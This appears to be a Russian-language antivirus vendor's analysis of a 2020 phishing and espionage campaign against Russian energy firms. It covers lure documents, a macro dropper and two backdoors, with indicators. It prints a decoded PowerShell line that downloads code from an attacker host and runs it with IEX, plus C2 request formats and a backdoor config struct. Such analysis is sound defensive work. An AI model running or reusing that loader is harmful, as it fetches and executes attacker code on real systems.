РасслСдуСм Ρ†Π΅Π»Π΅Π²ΡƒΡŽ ΡˆΠΏΠΈΠΎΠ½ΡΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ Π½Π° российский ВЭК

РасслСдуСм Ρ†Π΅Π»Π΅Π²ΡƒΡŽ ΡˆΠΏΠΈΠΎΠ½ΡΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ Π½Π° российский ВЭК

Наш ΠΎΠΏΡ‹Ρ‚ расслСдования ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚ΠΎΠ² Π² сфСрС ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π½ΠΎΠΉ бСзопасности ΠΏΠΎΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚, Ρ‡Ρ‚ΠΎ элСктронная ΠΏΠΎΡ‡Ρ‚Π° ΠΏΠΎ-ΠΏΡ€Π΅ΠΆΠ½Π΅ΠΌΡƒ являСтся ΠΎΠ΄Π½ΠΈΠΌ ΠΈΠ· самых распространСнных ΠΊΠ°Π½Π°Π»ΠΎΠ², ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡ‹Ρ… Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌΠΈ для ΠΏΠ΅Ρ€Π²ΠΈΡ‡Π½ΠΎΠ³ΠΎ проникновСния Π² Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌΡ‹Π΅ сСтСвыС инфраструктуры. Одно Π½Π΅ΠΎΡΠΌΠΎΡ‚Ρ€ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠ΅ дСйствиС с ΠΏΠΎΠ΄ΠΎΠ·Ρ€ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΌ (ΠΈΠ»ΠΈ Π½Π΅ ΠΎΡ‡Π΅Π½ΡŒ) письмом становится Ρ‚ΠΎΡ‡ΠΊΠΎΠΉ Π²Ρ…ΠΎΠ΄Π° для дальнСйшСго зараТСния, поэтому кибСрпрСступники Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎ ΠΏΡ€ΠΈΠΌΠ΅Π½ΡΡŽΡ‚ ΠΌΠ΅Ρ‚ΠΎΠ΄Ρ‹ социнТСнСрии, ΠΏΡƒΡΡ‚ΡŒ ΠΈ с ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹ΠΌ успСхом.

Π’ этом постС ΠΌΡ‹ Ρ…ΠΎΡ‚ΠΈΠΌ Ρ€Π°ΡΡΠΊΠ°Π·Π°Ρ‚ΡŒ ΠΎ нашСм Π½Π΅Π΄Π°Π²Π½Π΅ΠΌ расслСдовании спам-ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ, Π½Π°Ρ†Π΅Π»Π΅Π½Π½ΠΎΠΉ Π½Π° ряд прСдприятий Ρ‚ΠΎΠΏΠ»ΠΈΠ²Π½ΠΎ-энСргСтичСского комплСкса России. ВсС Π°Ρ‚Π°ΠΊΠΈ происходили ΠΏΠΎ ΠΎΠ΄Π½ΠΎΠΌΡƒ ΡΡ†Π΅Π½Π°Ρ€ΠΈΡŽ с использованиСм ΠΏΠΎΠ΄Π΄Π΅Π»ΡŒΠ½Ρ‹Ρ… элСктронных писСм, ΠΏΡ€ΠΈ этом Π½Π°Π΄ тСкстовым содСрТаниСм этих писСм, каТСтся, Π½ΠΈΠΊΡ‚ΠΎ особо Π½Π΅ старался.

Π Π°Π·Π²Π΅Π΄ΠΊΠ°

ВсС Π½Π°Ρ‡Π°Π»ΠΎΡΡŒ Π² ΠΊΠΎΠ½Ρ†Π΅ апрСля 2020 Π³ΠΎΠ΄Π°, ΠΊΠΎΠ³Π΄Π° вирусныС Π°Π½Π°Π»ΠΈΡ‚ΠΈΠΊΠΈ Β«Π”ΠΎΠΊΡ‚ΠΎΡ€ Π’Π΅Π±Β» зафиксировали спам-кампанию, Π² Ρ…ΠΎΠ΄Π΅ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ сотрудникам ряда прСдприятий Ρ‚ΠΎΠΏΠ»ΠΈΠ²Π½ΠΎ-энСргСтичСского комплСкса России Ρ…Π°ΠΊΠ΅Ρ€Ρ‹ рассылали ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½Π½Ρ‹ΠΉ Ρ‚Π΅Π»Π΅Ρ„ΠΎΠ½Π½Ρ‹ΠΉ справочник. РазумССтся, это Π½Π΅ Π±Ρ‹Π»ΠΎ простым проявлСниСм Π·Π°Π±ΠΎΡ‚Ρ‹, Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ справочник Π±Ρ‹Π» нСнастоящий, Π° .docx-Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Ρ‹ Π·Π°Π³Ρ€ΡƒΠΆΠ°Π»ΠΈ Π΄Π²Π° изобраТСния с ΡƒΠ΄Π°Π»Π΅Π½Π½Ρ‹Ρ… рСсурсов.

Одно ΠΈΠ· Π½ΠΈΡ… Π·Π°Π³Ρ€ΡƒΠΆΠ°Π»ΠΎΡΡŒ Π½Π° ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΠΉ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ с сСрвСра news[.]zannews[.]com. ΠŸΡ€ΠΈΠΌΠ΅Ρ‡Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎ, Ρ‡Ρ‚ΠΎ Π΄ΠΎΠΌΠ΅Π½Π½ΠΎΠ΅ имя схоТС с Π΄ΠΎΠΌΠ΅Π½ΠΎΠΌ Π°Π½Ρ‚ΠΈΠΊΠΎΡ€Ρ€ΡƒΠΏΡ†ΠΈΠΎΠ½Π½ΠΎΠ³ΠΎ ΠΌΠ΅Π΄ΠΈΠ°Ρ†Π΅Π½Ρ‚Ρ€Π° ΠšΠ°Π·Π°Ρ…ΡΡ‚Π°Π½Π° β€” zannews[.]kz. Π‘ Π΄Ρ€ΡƒΠ³ΠΎΠΉ стороны, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡ‹ΠΉ Π΄ΠΎΠΌΠ΅Π½ сразу Π½Π°ΠΏΠΎΠΌΠ½ΠΈΠ» ΠΎ Π΄Ρ€ΡƒΠ³ΠΎΠΉ ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ 2015 Π³ΠΎΠ΄Π°, извСстной ΠΊΠ°ΠΊ TOPNEWS, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ использовался бэкдор ICEFOG, Π° Π΄ΠΎΠΌΠ΅Π½Ρ‹ управлСния троянами ΠΈΠΌΠ΅Π»ΠΈ подстроку Β«newsΒ» Π² названиях. Π”Ρ€ΡƒΠ³ΠΎΠΉ интСрСсной ΠΎΡΠΎΠ±Π΅Π½Π½ΠΎΡΡ‚ΡŒΡŽ стало Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠ΅ писСм Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹ΠΌ адрСсатам Π² запросах Π½Π° Π·Π°Π³Ρ€ΡƒΠ·ΠΊΡƒ изобраТСния использовались Π»ΠΈΠ±ΠΎ Ρ€Π°Π·Π½Ρ‹Π΅ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρ‹ запроса, Π»ΠΈΠ±ΠΎ ΠΆΠ΅ ΡƒΠ½ΠΈΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΈΠΌΠ΅Π½Π° ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠΉ.

ΠœΡ‹ считаСм, Ρ‡Ρ‚ΠΎ это Π±Ρ‹Π»ΠΎ сдСлано с Ρ†Π΅Π»ΡŒΡŽ сбора ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ для опрСдСлСния Β«Π½Π°Π΄Π΅ΠΆΠ½ΠΎΠ³ΠΎΒ» адрСсата, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π² ΠΏΠΎΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΌ Π² Π½ΡƒΠΆΠ½Ρ‹ΠΉ ΠΌΠΎΠΌΠ΅Π½Ρ‚ Π³Π°Ρ€Π°Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎ ΠΎΡ‚ΠΊΡ€ΠΎΠ΅Ρ‚ письмо. Для Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ изобраТСния со Π²Ρ‚ΠΎΡ€ΠΎΠ³ΠΎ сСрвСра использовался ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ» SMB, Ρ‡Ρ‚ΠΎ ΠΌΠΎΠ³Π»ΠΎ Π±Ρ‹Ρ‚ΡŒ сдСлано для сбора NetNTLM-Ρ…Π΅ΡˆΠ΅ΠΉ с ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ΠΎΠ² сотрудников, ΠΎΡ‚ΠΊΡ€Ρ‹Π²ΡˆΠΈΡ… ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹ΠΉ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚.

А Π²ΠΎΡ‚ ΠΈ само письмо с Ρ„Π΅ΠΉΠΊΠΎΠ²Ρ‹ΠΌ справочником:

РасслСдуСм Ρ†Π΅Π»Π΅Π²ΡƒΡŽ ΡˆΠΏΠΈΠΎΠ½ΡΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ Π½Π° российский ВЭК

Π’ июнС этого Π³ΠΎΠ΄Π° Ρ…Π°ΠΊΠ΅Ρ€Ρ‹ Π½Π°Ρ‡Π°Π»ΠΈ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ для Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ ΠΈΠ·ΠΎΠ±Ρ€Π°ΠΆΠ΅Π½ΠΈΠΉ Π½ΠΎΠ²ΠΎΠ΅ Π΄ΠΎΠΌΠ΅Π½Π½ΠΎΠ΅ имя β€” sports[.]manhajnews[.]com. Как ΠΏΠΎΠΊΠ°Π·Π°Π» Π°Π½Π°Π»ΠΈΠ·, субдомСны manhajnews[.]com использовались Π² спам-рассылках ΠΊΠ°ΠΊ ΠΌΠΈΠ½ΠΈΠΌΡƒΠΌ с сСнтября 2019 Π³ΠΎΠ΄Π°. Одной ΠΈΠ· Ρ†Π΅Π»Π΅ΠΉ Π² Ρ€Π°ΠΌΠΊΠ°Ρ… этой ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ оказался ΠΊΡ€ΡƒΠΏΠ½Ρ‹ΠΉ российский унивСрситСт.

Π’Π°ΠΊΠΆΠ΅ ΠΊ июню ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ‚ΠΎΡ€Ρ‹ Π°Ρ‚Π°ΠΊΠΈ ΠΏΡ€ΠΈΠ΄ΡƒΠΌΠ°Π»ΠΈ Π½ΠΎΠ²Ρ‹ΠΉ тСкст для своих писСм: Π½Π° этот Ρ€Π°Π· Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ содСрТал ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎΠ± отраслСвом Ρ€Π°Π·Π²ΠΈΡ‚ΠΈΠΈ. ВСкст письма явно ΡƒΠΊΠ°Π·Ρ‹Π²Π°Π» Π½Π° Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ Π΅Π³ΠΎ Π°Π²Ρ‚ΠΎΡ€ Π»ΠΈΠ±ΠΎ Π½Π΅ являСтся носитСлСм русского языка, Π»ΠΈΠ±ΠΎ Π½Π°ΠΌΠ΅Ρ€Π΅Π½Π½ΠΎ создаСт ΠΎ сСбС Ρ‚Π°ΠΊΠΎΠ΅ Π²ΠΏΠ΅Ρ‡Π°Ρ‚Π»Π΅Π½ΠΈΠ΅. К соТалСнию, ΠΈΠ΄Π΅ΠΈ отраслСвого развития, ΠΊΠ°ΠΊ всСгда, оказались лишь ΠΏΡ€ΠΈΠΊΡ€Ρ‹Ρ‚ΠΈΠ΅ΠΌ β€” Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ вновь Π·Π°Π³Ρ€ΡƒΠΆΠ°Π» Π΄Π²Π° изобраТСния, ΠΏΡ€ΠΈ этом сСрвСр Π±Ρ‹Π» ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ Π½Π° download[.]inklingpaper[.]com.

Π‘Π»Π΅Π΄ΡƒΡŽΡ‰Π΅Π΅ Π½ΠΎΠ²ΠΎΠ²Π²Π΅Π΄Π΅Π½ΠΈΠ΅ послСдовало Π² июлС. Π’ качСствС ΠΏΠΎΠΏΡ‹Ρ‚ΠΊΠΈ ΠΎΠ±ΠΎΠΉΡ‚ΠΈ Π΄Π΅Ρ‚Π΅ΠΊΡ‚ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ врСдоносных Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΎΠ² антивирусными ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌΠΈ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ стали ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Ρ‹ Microsoft Word, Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ пароля. ΠžΠ΄Π½ΠΎΠ²Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎ с этим Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠ΅ Ρ€Π΅ΡˆΠΈΠ»ΠΈ ΠΏΡ€ΠΈΠΌΠ΅Π½ΠΈΡ‚ΡŒ классичСский ΠΏΡ€ΠΈΠ΅ΠΌ социнТСнСрии β€” ΡƒΠ²Π΅Π΄ΠΎΠΌΠ»Π΅Π½ΠΈΠ΅ ΠΎ Π²ΠΎΠ·Π½Π°Π³Ρ€Π°ΠΆΠ΄Π΅Π½ΠΈΠΈ.

РасслСдуСм Ρ†Π΅Π»Π΅Π²ΡƒΡŽ ΡˆΠΏΠΈΠΎΠ½ΡΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ Π½Π° российский ВЭК

ВСкст обращСния вновь Π±Ρ‹Π» написан Π² ΠΏΡ€Π΅ΠΆΠ½Π΅ΠΌ стилС, Ρ‡Π΅ΠΌ Π²Ρ‹Π·Ρ‹Π²Π°Π» Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ подозрСния Ρƒ адрСсата. Π‘Π΅Ρ€Π²Π΅Ρ€ для скачивания изобраТСния Ρ‚Π°ΠΊΠΆΠ΅ Π½Π΅ мСнялся.

ΠžΡ‚ΠΌΠ΅Ρ‚ΠΈΠΌ, Ρ‡Ρ‚ΠΎ Π²ΠΎ всСх случаях для рассылки писСм использовались элСктронныС ΠΏΠΎΡ‡Ρ‚ΠΎΠ²Ρ‹Π΅ ящики, зарСгистрированныС Π½Π° Π΄ΠΎΠΌΠ΅Π½Π°Ρ… mail[.]ru ΠΈ yandex[.]ru.

Атака

К Π½Π°Ρ‡Π°Π»Ρƒ сСнтября 2020 Π³ΠΎΠ΄Π° настало врСмя Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹Ρ… дСйствий. Наши вирусныС Π°Π½Π°Π»ΠΈΡ‚ΠΈΠΊΠΈ зафиксировали Π½ΠΎΠ²ΡƒΡŽ Π²ΠΎΠ»Π½Ρƒ Π°Ρ‚Π°ΠΊ, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ вновь рассылали письма ΠΏΠΎΠ΄ ΠΏΡ€Π΅Π΄Π»ΠΎΠ³ΠΎΠΌ обновлСния Ρ‚Π΅Π»Π΅Ρ„ΠΎΠ½Π½ΠΎΠ³ΠΎ справочника. Однако Π½Π° этот Ρ€Π°Π· Π²Π»ΠΎΠΆΠ΅Π½ΠΈΠ΅ содСрТало врСдоносный макрос.

ΠŸΡ€ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠΈ ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½Π½ΠΎΠ³ΠΎ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚Π° макрос создавал Π΄Π²Π° Ρ„Π°ΠΉΠ»Π°:

  • VBS-скрипт %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ прСдназначался для запуска ΠΏΠ°ΠΊΠ΅Ρ‚Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π°;
  • сам ΠΏΠ°ΠΊΠ΅Ρ‚Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ» %APPDATA%configstest.bat, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±Ρ‹Π» обфусцирован.

РасслСдуСм Ρ†Π΅Π»Π΅Π²ΡƒΡŽ ΡˆΠΏΠΈΠΎΠ½ΡΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ Π½Π° российский ВЭК

Π‘ΡƒΡ‚ΡŒ Π΅Π³ΠΎ Ρ€Π°Π±ΠΎΡ‚Ρ‹ сводится ΠΊ запуску ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠΈ Powershell с ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹ΠΌΠΈ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π°ΠΌΠΈ. ΠŸΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρ‹, ΠΏΠ΅Ρ€Π΅Π΄Π°Π²Π°Π΅ΠΌΡ‹Π΅ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠ΅, Π΄Π΅ΠΊΠΎΠ΄ΠΈΡ€ΡƒΡŽΡ‚ΡΡ Π² ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

Как слСдуСт ΠΈΠ· прСдставлСнных ΠΊΠΎΠΌΠ°Π½Π΄, Π΄ΠΎΠΌΠ΅Π½, с ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ загруТаСтся полСзная Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠ°, вновь замаскирован ΠΏΠΎΠ΄ новостной сайт. На Π·Π°Ρ€Π°ΠΆΠ°Π΅ΠΌΡ‹ΠΉ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ доставляСтся простой Π·Π°Π³Ρ€ΡƒΠ·Ρ‡ΠΈΠΊ, СдинствСнной Π·Π°Π΄Π°Ρ‡Π΅ΠΉ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ являСтся ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ шСлл-ΠΊΠΎΠ΄Π° ΠΎΡ‚ ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰Π΅Π³ΠΎ сСрвСра ΠΈ Π΅Π³ΠΎ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅. Нам ΡƒΠ΄Π°Π»ΠΎΡΡŒ Π²Ρ‹ΡΠ²ΠΈΡ‚ΡŒ Π΄Π²Π° Π²ΠΈΠ΄Π° бэкдоров, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ установлСны Π½Π° ПК ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹.

BackDoor.Siggen2.3238

ΠŸΠ΅Ρ€Π²Ρ‹ΠΉ ΠΈΠ· Π½ΠΈΡ… β€” BackDoor.Siggen2.3238 β€” Ρ€Π°Π½Π΅Π΅ Π½Π΅ встрСчался нашим спСциалистам, ΠΏΡ€ΠΈ этом ΠΊΠ°ΠΊΠΈΠ΅-Π»ΠΈΠ±ΠΎ упоминания этой ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ Π΄Ρ€ΡƒΠ³ΠΈΠΌΠΈ антивирусными Π²Π΅Π½Π΄ΠΎΡ€Π°ΠΌΠΈ Ρ‚Π°ΠΊΠΆΠ΅ Π½Π΅ нашлись.

Π­Ρ‚Π° ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° прСдставляСт собой бэкдор, написанный Π½Π° C++ ΠΈ Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‰ΠΈΠΉ Π² срСдС 32-Π±ΠΈΡ‚Π½Ρ‹Ρ… ОБ Windows.

BackDoor.Siggen2.3238 способСн ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°Ρ‚ΡŒ связь с ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰ΠΈΠΌ сСрвСром ΠΏΠΎ Π΄Π²ΡƒΠΌ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Π°ΠΌ: HTTP ΠΈ HTTPS. Π’ исслСдованном ΠΎΠ±Ρ€Π°Π·Ρ†Π΅ задСйствован ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ» HTTPS. Π’ запросах ΠΊ сСрвСру ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΉ User-Agent:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

ΠŸΡ€ΠΈ этом всС запросы ΡΠ½Π°Π±ΠΆΠ°ΡŽΡ‚ΡΡ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ Π½Π°Π±ΠΎΡ€ΠΎΠΌ ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€ΠΎΠ²:

%s;type=%s;length=%s;realdata=%send

Π³Π΄Π΅ каТдая строка %s соотвСтствСнно замСняСтся Π½Π°:

  • ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ‚ΠΎΡ€ Π·Π°Ρ€Π°ΠΆΠ΅Π½Π½ΠΎΠ³ΠΎ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π°,
  • Ρ‚ΠΈΠΏ отправляСмого запроса,
  • Π΄Π»ΠΈΠ½Ρƒ Π΄Π°Π½Π½Ρ‹Ρ… Π² ΠΏΠΎΠ»Π΅ realdata,
  • Π΄Π°Π½Π½Ρ‹Π΅.

На стадии сбора ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎΠ± ΠΈΠ½Ρ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΉ систСмС бэкдор Ρ„ΠΎΡ€ΠΌΠΈΡ€ΡƒΠ΅Ρ‚ строку Π²ΠΈΠ΄Π°:

lan=%s;cmpname=%s;username=%s;version=%s;

Π³Π΄Π΅ lan β€” IP-адрСс Π·Π°Ρ€Π°ΠΆΠ΅Π½Π½ΠΎΠ³ΠΎ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π°, cmpname β€” имя ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π°, username β€” имя ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, version β€” строка 0.0.4.03.

Π­Ρ‚Π° информация с ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ‚ΠΎΡ€ΠΎΠΌ sysinfo Ρ‡Π΅Ρ€Π΅Π· POST-запрос отправляСтся Π½Π° ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰ΠΈΠΉ сСрвСр, располоТСнный ΠΏΠΎ адрСсу https[:]//31.214[.]157.14/log.txt. Если Π² ΠΎΡ‚Π²Π΅Ρ‚ BackDoor.Siggen2.3238 ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ сигнал HEART, соСдинСниС считаСтся ΡƒΡΠΏΠ΅ΡˆΠ½Ρ‹ΠΌ, ΠΈ бэкдор приступаСт ΠΊ основному Ρ†ΠΈΠΊΠ»Ρƒ общСния с сСрвСром.

Π‘ΠΎΠ»Π΅Π΅ ΠΏΠΎΠ»Π½ΠΎΠ΅ описаниС ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏΠΎΠ² Ρ€Π°Π±ΠΎΡ‚Ρ‹ BackDoor.Siggen2.3238 находится Π² нашСй вирусной Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ΅.

BackDoor.Whitebird.23

Вторая ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° являСтся ΠΌΠΎΠ΄ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠ΅ΠΉ ΡƒΠΆΠ΅ извСстного Π½Π°ΠΌ ΠΏΠΎ ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚Ρƒ с государствСнным ΡƒΡ‡Ρ€Π΅ΠΆΠ΄Π΅Π½ΠΈΠ΅ΠΌ ΠšΠ°Π·Π°Ρ…ΡΡ‚Π°Π½Π° бэкдора BackDoor.Whitebird. Π­Ρ‚Π° вСрсия написана Π½Π° языкС Π‘++ ΠΈ ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Π° для Ρ€Π°Π±ΠΎΡ‚Ρ‹ ΠΊΠ°ΠΊ Π² 32-разрядных, Ρ‚Π°ΠΊ ΠΈ Π² 64-разрядных ОБ Windows.

Как ΠΈ Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ этого Ρ‚ΠΈΠΏΠ°, BackDoor.Whitebird.23 ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½ для установки Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ соСдинСния с ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰ΠΈΠΌ сСрвСром ΠΈ нСсанкционированного управлСния Π·Π°Ρ€Π°ΠΆΠ΅Π½Π½Ρ‹ΠΌ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ΠΎΠΌ. Π’ ΡΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½ΡƒΡŽ систСму устанавливаСтся ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ Π΄Ρ€ΠΎΠΏΠΏΠ΅Ρ€Π° BackDoor.Siggen2.3244.

Π˜ΡΡΠ»Π΅Π΄ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ Π½Π°ΠΌΠΈ ΠΎΠ±Ρ€Π°Π·Π΅Ρ† прСдставлял собой Π²Ρ€Π΅Π΄ΠΎΠ½ΠΎΡΠ½ΡƒΡŽ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΡƒ с двумя экспортами:

  • GooglePlay,
  • Test.

Π’ Π½Π°Ρ‡Π°Π»Π΅ своСй Ρ€Π°Π±ΠΎΡ‚Ρ‹ Ρ€Π°ΡΡˆΠΈΡ„Ρ€ΠΎΠ²Ρ‹Π²Π°Π΅Ρ‚ Π·Π°ΡˆΠΈΡ‚ΡƒΡŽ Π² Ρ‚Π΅Π»ΠΎ бэкдора ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΡŽ Π°Π»Π³ΠΎΡ€ΠΈΡ‚ΠΌΠΎΠΌ Π½Π° основС XOR-ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΈ с Π±Π°ΠΉΡ‚ΠΎΠΌ 0x99. ΠšΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΡ ΠΈΠΌΠ΅Π΅Ρ‚ Π²ΠΈΠ΄:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

